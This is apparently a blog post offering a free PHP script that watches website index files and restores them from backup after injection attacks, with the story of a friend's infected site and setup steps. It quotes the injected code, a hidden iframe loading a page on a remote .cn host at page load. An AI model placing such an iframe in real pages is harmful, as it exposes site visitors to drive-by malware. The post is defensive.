Here is a little piece of software that will effectively protect your web page against so called injection attacks, which are bound to happen to your web page sooner or later. It’s free to download and free to use. If you have a question, please ask. And trust me on this one: no1’s ones are safe ( and neither are one’s zeroes), resistance is futile and all our bases are belong to us! And of course, there’s a story to it, so keep reading …

A while ago a friend of mine asked me to check his web page as his visitors complained about it being infected with a virus or something. Since I was logged into my Google account at the time, an attempt at visiting the page was blocked by a warning page stating that the site has been attacked. I was dumb enough to proceed to the page anyway and luckily my AVG anti virus promptly detected mallware code and prevented me to even see the page. I had to download infected page via ftp and again AVG killed the file mid-air, so to see the infected file I had to rename it on the server and smuggle it behind AVG’s back. An there it was, injected just after the body tag, a hidden iframe pointing to a page in China. Like this one:

<iframe src=”http://thisorthat.cn:8080/index.php” width=154 height=115 style=”visibility: hidden”></iframe>

Didn’t bother following  the link to find what monsters inhabit mainland

China. Just cleaned out the suspicious code, uploaded and renamed the file, went to Google webmaster tools to request another page health check, waited a few hours, revisited the page, cleaned all subsequent reinfections, went to web master central, requested another health check, … You get the picture. All the fun you can imagine. The host master in charge of the web server where the injections occurred was no help either and was only repeating he is not the one to blame. A web search for injection attack returned a few pages with no useful info on how to protect against such attacks, except urging web masters to use strong passwords and secure connections (which helps BTW, but not always), although it was quite clear that injections are fairly common. And when you know what to look for, you are likely to find out most hosting providers are vulnerable and what’s worse, in denial of imminent threat. Files most likely to be injected are all index*.* and default*.* (.php, .htm, .html, .asp), so protecting these files is what we are after. Webprotector.php monitors selected files on the web server and restores them from healthy local backup (which should be backed up and monitored by a proven and up to date anti-mallware) when (there’s no doubt it is when, not if) they are tampered with. It works in interactive mode or as a shell script under linux.

Instructions

Script name: weprotector.php – blind brute force web page injection attack protector
Description: protects a list of web pages and files that are likely to be targeted by injection attack by restoring files from local backup whenever they are modiffied

1. extract files from webprotector.zip into a protected web page folder of your choice which ONLY YOU can access
2. edit xinject.lst to create a list of web pages and files, like:

   •  www.domain.tld/,

      ftp://user:password@ftpserver/www.domain.tld/,

      local_backup_folder_for_domain.tld,

      index.php:

      subfolder/index.php:

      anothersubfolder/index.html:

      ;

      www.another_domain.tld/,

      ftp://user:password@ftpserver/another_domain/,

      local_backup_folder_for_another_domain,

      index.php:

      somesubfolder/default.html:

      ;

3. point your browser to webprotector.php on your web server and use scan to check and tune your settings
4. use form at the bottom of the page to test and tune parts of your list
5. use heal to periodically check and heal protected pages and files
6. create a script like the following one to schedule checking and healing
   • Note: script parameter prevents any output and at the same time enables file restoration ( like heal in interactive mode) Recomended schedule is at least every 15 minutes, but not more often than every 5 minutes

     cd /home/webpage/protector/

     /usr/bin/php webprotector.php script

7. consider ordering an original limited edition print

Note

When webprotector.php fails to restore healthy pages, it uses wput command, which you must download and install separately from sourceforge. Webprotector.php calls wput from /usr/local/bin, so put it there or adjust the path in webprotector.php

Absence of style

This is a blind brute force approach to protecting any web page against various injection attacks, flood, fire, insane acts of bad fortune, terminal deseases, comon flu, bad taste, … and so on. It may not demonstrate a luxurious amounts of class, ellegance, or style, but it gets the job done!

Download webprotector

Tags: plugin, Wordpress